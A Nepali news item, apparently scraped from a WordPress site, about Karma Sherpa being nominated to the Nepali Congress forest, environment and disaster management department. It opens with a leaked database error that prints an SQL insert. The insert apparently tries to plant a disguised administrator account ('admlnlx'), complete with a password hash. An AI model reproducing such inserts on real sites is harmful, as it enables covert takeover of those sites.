WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.Z/EC5M43S9H1jT9tb5AVKEdjmR0Y.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 20:29:22', '', 'admlnlx', 'admlnlx')
सोलुखुम्बुमा । नेपाली काँग्रेस प्रदेश न १ सोलुखुम्बु “ख” का सभापति युवा नेता कर्मा शेर्पा नेपाली कांग्रेसको वन, वातावरण तथा विपद ब्यवस्थापन विभागकाे केन्द्रीय सदस्यमा मनोनीत हुनु भएको छ ।
नेपाली कांग्रेसका सभापति शेरबहादुर देउवाले शेर्पालाई उक्त पदमा मनोनित गर्नु भएको हो । मनोनयनपछि शेर्पाले आभार प्रकट गर्दै विश्वास गरेर दिएकाे जिम्मेवारी इमानदारीपूर्वक निर्वाह गर्ने अठाेट व्यक्त गर्नुभयो ।
पार्टीको नीति अनुरुप सक्रियताका साथ विभागीय जिम्मेवारी पूरा गर्नु आफ्नो दायित्व भएकोउहाँको भनाइ छ। शेर्पा विगत लामो समयदेखि नेपाली कांग्रेसमा क्रियाशील रहँदै समाज सेवामा सक्रिय हुनुहुन्छ ।